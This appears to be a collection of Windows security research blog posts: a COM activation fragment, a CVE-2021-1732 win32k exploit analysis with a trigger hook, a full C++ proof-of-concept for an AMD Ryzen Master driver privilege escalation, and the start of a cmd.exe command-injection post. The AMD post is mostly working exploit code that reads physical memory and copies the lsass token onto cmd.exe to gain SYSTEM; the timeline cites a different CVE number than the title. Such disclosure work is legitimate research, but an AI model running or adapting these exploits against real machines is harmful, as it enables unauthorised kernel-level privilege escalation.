      return pClassActivator->GetClassObject(m_clsid, 
            CLSCTX_SERVER, 0, riid, ppv);

  // ...

The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

HRESULT CSessionMoniker::GetClassObject(
   REFCLSID pClassID, CLSCTX dwClsContext, 
   LCID locale, REFIID riid, void **ppv) {
  IStandardActivator* pActivator;
  CoCreateInstance(&CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, 
    IID_IStandardActivator, &pActivator);

  ISpecialSystemProperties pSpecialProperties;
  pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
  return pActivator->StandardGetClassObject(pClassId, dwClsContext, 
                                            NULL, riid, ppv);


Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state. It then calls the StandardGetClassObject method on the IStandardActivator and you should now have a COM server cross-session. None of these interface or the class are officially documented of course (AFAIK).

The $1000 question is, can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE for the implementation of the interface you find one of its functions is:

HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
  REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
  IStorage* pstg, int dwCount, MULTI_QI pResults[]);

It seems that the answer is yes. Of course it's possible that you still can't mix the two things up. That's why I wrote a quick and dirty example in C#, which is available here. Seems to work fine. Of course I've not tested it out with the actual vulnerability to see it works in that scenario. That's something for others to do.

CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds

25 March 2021 at 00:00

CVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT organization in one operation which was disclosed in February this year[1][2][3]. This vulnerability exploits a user mode callback opportunity in win32kfull module to break the normal execution flow and set the error flag of window object (tagWND) extra data, which results in kernel-space out-of-bounds memory access violation.

Root cause analysis

The root cause of CVE-2021-1732 is:
In the process of creating window (CreateWindowEx), when the window object tagWND has extra data (tagWND.cbwndExtra != 0), the function pointer of user32!_xxxClientAllocWindowClassExtraBytes saved in ntdll!_PEB.kernelCallbackTable (offset+0x58) in user mode will be called via the nt!KeUserModeCallback callback mechanism, and the system heap allocator (ntdll!RtlAllocateHeap) is used to allocate the extra data memory in user-space.
By hooking user32!_xxxClientAllocWindowClassExtraBytes function in user mode, and modifying the properties of the window object extra data in the hook function manually, the kernel mode atomic operation of allocating memory for extra data can be broken, then the out-of-bounds read/write ability based on the extra data memory is achieved finally.

The normal flow of the window object creation (CreateWindowEx) process is shown as follows (partial):

From the above figure, we can see that: when the window extra data size (tagWND.cbWndExtra) is not 0, win32kfull!xxxCreateWindowEx calls the user mode function user32!_xxxClientAllocWindowClassExtraBytes via the kernel callback mechanism, requests for the memory of the window extra data in user-space. After allocation, the pointer of allocated memory in user-space will be returned to the tagWND.pExtraBytes property:

Here are two modes of saving tagWND extra data address (tagWND.pExtraBytes):
[Mode 1] In user-space system heap
As the normal process shown in the figure above, the pointer of extra data memory allocated in user-space system heap is saved in tagWND.pExtraBytes directly.
One tagWND memory layout of Mode 1 is shown in the following figure:

[Mode 2] In kernel-space desktop heap
The function ntdll!NtUserConsoleControl allocates extra data memory in kernel-space desktop heap by function DesktopAlloc, calculates the offset of allocated extra data memory address to the kernel desktop heap base address, saves the offset to tagWND.pExtraBytes, and modifies tagWND.extraFlag |= 0x800:

One tagWND memory layout of Mode 2 is shown in the following figure: avatar

So we can hook the function user32!_xxxClientAllocWindowClassExtraBytes in user-space, call NtUserConsoleControl manually in hook function to modify the tagWND extra data storage mode from Mode 1 to Mode 2, call ntdll!NtCallbackReturn before the callback returns:

Then return the user mode controllable offset value to tagWND.pExtraBytes through ntdll!NtCallbackReturn, and realize the controllable offset out-of-bounds read/write ability based on the kernel-space desktop heap base address finally.

The modified process which can trigger the vulnerability is shown as follows:

According to the modified flowchart above, the key steps of triggering this vulnerability are explained as follows:

  1. Modify the user32!_xxxClientAllocWindowClassExtraBytes function pointer in PEB.kernelCallbackTable to a custom hook function.
  2. Create some normal window objects, and leak the user-space memory addresses of these tagWND kernel objects through user32!HMValidateHandle.
  3. Destroy part of the normal window objects created in step 2, and create one new window object named ‘hwndMagic’ with the specified tagWND.cbwndExtra. The hwndMagic can probably reuse the previously released window object memory. Therefore, by searching the previously leaked window object user-space memory addresses with the specified tagWND.cbwndExtra in the custom hook function, the hwndMagic can be found before CreateWindowEx returns.
  4. Call NtUserConsoleControl in the custom hook function to modify the tagWNDMagic.extraFlag with flag 0x800.
  5. Call NtCallbackReturn in the custom hook function to assign a fake offset to tagWNDMagic.pExtraBytes.
  6. Call SetWindowLong to write data to the address of kernel-space desktop heap base address + specified offset, which can result in out-of-bounds memory access violation.

An implementation of the hook function is demonstrated as follows:

void* WINAPI MyxxxClientAllocWindowClassExtraBytes(ULONG* size) {

	do {
		if (MAGIC_CBWNDEXTRA  == *size) {
			HWND hwndMagic = NULL;
			//search from freed NormalClass window mapping desktop heap
			for (int i = 2; i < 50; ++i) {
				ULONG_PTR cbWndExtra = *(ULONG_PTR*)(g_pWnd[i] + _WND_CBWNDEXTRA_OFFSET);
				if (MAGIC_CBWNDEXTRA == cbWndExtra) {
					hwndMagic = (HWND)*(ULONG_PTR*)(g_pWnd[i]);
					printf("[+] bingo! find &hwndMagic = 0x%llx in callback :) \n", g_pWnd[i]);
			if (!hwndMagic) {
				printf("[-] Not found hwndMagic, memory layout unsuccessfully :( \n");

			// 1. set hwndMagic extraFlag |= 0x800
			CONSOLEWINDOWOWNER consoleOwner = { 0 };
			consoleOwner.hwnd = hwndMagic;
			consoleOwner.ProcessId = 1;
			consoleOwner.ThreadId = 2;
			NtUserConsoleControl(6, &consoleOwner, sizeof(consoleOwner));

			// 2. set hwndMagic pExtraBytes fake offset
			struct {
				ULONG_PTR retvalue;
				ULONG_PTR unused1;
				ULONG_PTR unused2;
			} result = { 0 };		
			//offset = 0xffffff00, access memory = heap base + 0xffffff00, trigger BSOD	
			result.retvalue = 0xffffff00;			
			NtCallbackReturn(&result, sizeof(result), 0);
	} while (false);

	return _xxxClientAllocWindowClassExtraBytes(size);

BSOD snapshot:

Exploit analysis

From Root cause anaysis, we can see that:
“An opportunity to read/write data in the address which calculated by the kernel-space desktop heap base address + specified offset” can be obtained via this vulnerability.

For the kernel mode exploitation, the attack target is to obtain system token generally. A common method is shown as follows:

  1. Exploit the vulnerability to obtain a arbitrary memory read/write primitive in kernel-space.
  2. Leak the address of some kernel object, find the system process through the EPROCESS chain.
  3. Copy the system process token to the attack process token to complete the privilege escalation job.

The obstacle is step 1: How to exploit “An opportunity to read/write data in the address which calculated by the kernel-space desktop heap base address + specified offset” to obtain the arbitrary memory read/write primitive in kernel-space.

One solution is shown in the following figure:

  1. The offset of tagWNDMagic extra data (wndMagic_extra_bytes) is controllable via the vulnerability, so we can use SetWindowLong to modify the data in specified address calculated by desktop heap base address + controllable offset.
  2. Use the vulnerability ability to modify tagWNDMagic.pExtraBytes to the offset of tagWND0 (the offset of tagWND0 is obtained by tagWND0+0x8), call SetWindowLong to modify tagWND0.cbWndExtra = 0x0fffffff to obtain a tampered tagWND0.pExtraBytes which can achieve read/write out-of-bounds.
  3. Calculate the offset from tagWND0.pExtraBytes to tagWND1, call SetWindowLongPtr to replace the spMenu of tagWND1 with a fake spMenu by the tampered tagWND0.pExtraBytes, realize the arbitrary memory read ability with the help of fake spMenu and function GetMenuBarInfo.
    The logic of GetMenuBarInfo to read the data in specified address is shown as follows, the 16 bytes data is stored into MENUBARINFO.rcBar structure: avatar

  4. Use the tampered tagWND0.pExtraBytes to modify tagWND1.pExtraBytes with specified address, and use the SetWindowLongPtr of tagWND1 to obtain the arbitrary memory write ability.
  5. After obtaining the arbitrary memory read/write primitive, we need to leak a kernel object address in desktop heap to find EPROCESS. Fortunately, when setting the fake spMenu for tagWND1 in step 3, the return value of SetWindowLongPtr is the kernel address of original spMenu, which can be used directly.
  6. Finally, find the system process by traversing the EPROCESS chain, and copy the system process token to the attack process to complete the privilege escalation job. This method is relatively common, so will not be described in detail.

The final privilege escalation demonstration:

Patch analysis




CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

By: h0mbre
13 October 2020 at 04:00


Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’github repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.


Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redudancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common of 3rd-party Windows drivers responsible for hardware configurations or diagnostics to make available to low-privileged users powerful routines that directly read from or write to physical memory.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the api was cross referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress] and does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, we see the other branch in our loop when our NumberOfBytes value is reached is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.


Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members was as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

As b33f explains, in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the length from my "Proc" tag once found, to the beginning of the EPROCESS structure where I know the offsets to the members I want varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the proc_address the literal place where "Proc" was and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.proc_address and also annotate how far from "Proc" it was until we reached our marker or the beginning of EPROCESS in PROC.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses as this is the most stable way to call the API

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),

        if (sys_result != 0) {


        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";

So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<—————–MEMORY PAGE—————–>

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:


I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the cmd.exe Token with the lsass.exe Token and then use that buffer in my call to the Write What Where routine.

So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.

You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        modulus + 0xc,
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        modulus + 0x8,

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        modulus + 0x8 + 0xc,
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    else {
        cout << "[!] Write operation failed, exiting...\n";

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
  • 18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
  • 18 May 2020 - 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020 - CVE-2020-12927 assigned
  • 13 Oct 2020 - Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <chrono>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;

    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(

    if (hFile == INVALID_HANDLE_VALUE)
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";

        if (DeviceIoControl(
            //cout << "[>] DeviceIoControl succeeded!\n";


        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            //cout << "[>] DeviceIoControl succeeded!\n";

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),

        if (sys_result != 0) {


        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        modulus + 0xc,

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        modulus + 0xc,
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        modulus + 0x8,

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        modulus + 0x8 + 0xc,
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    else {
        cout << "[!] Write operation failed, exiting...\n";

int main()
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);


Cmd Hijack - a command/argument confusion with path traversal in cmd.exe

10 June 2020 at 05:43

This one is about an interesting behavior 🤭 I identified in cmd.exe in result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors.

So I was mostly trying to:

  • find an encoding missmatch between some command check/sanitization code and the rest of the program, allowing to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯),
  • discover some hidden cmd.exe's counterpart of the unix shells' backtick operator,
  • find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability -

And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is 😃

For the lazy with no patience to read the whole thing, here comes the magic trick:

Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But should work with earlier versions as well... probably with all versions.

Some more context

Let's consider the following command line: cmd.exe /c "ping",
whereas is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command being preceded with the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. PHP shell_exec() function and its variants).

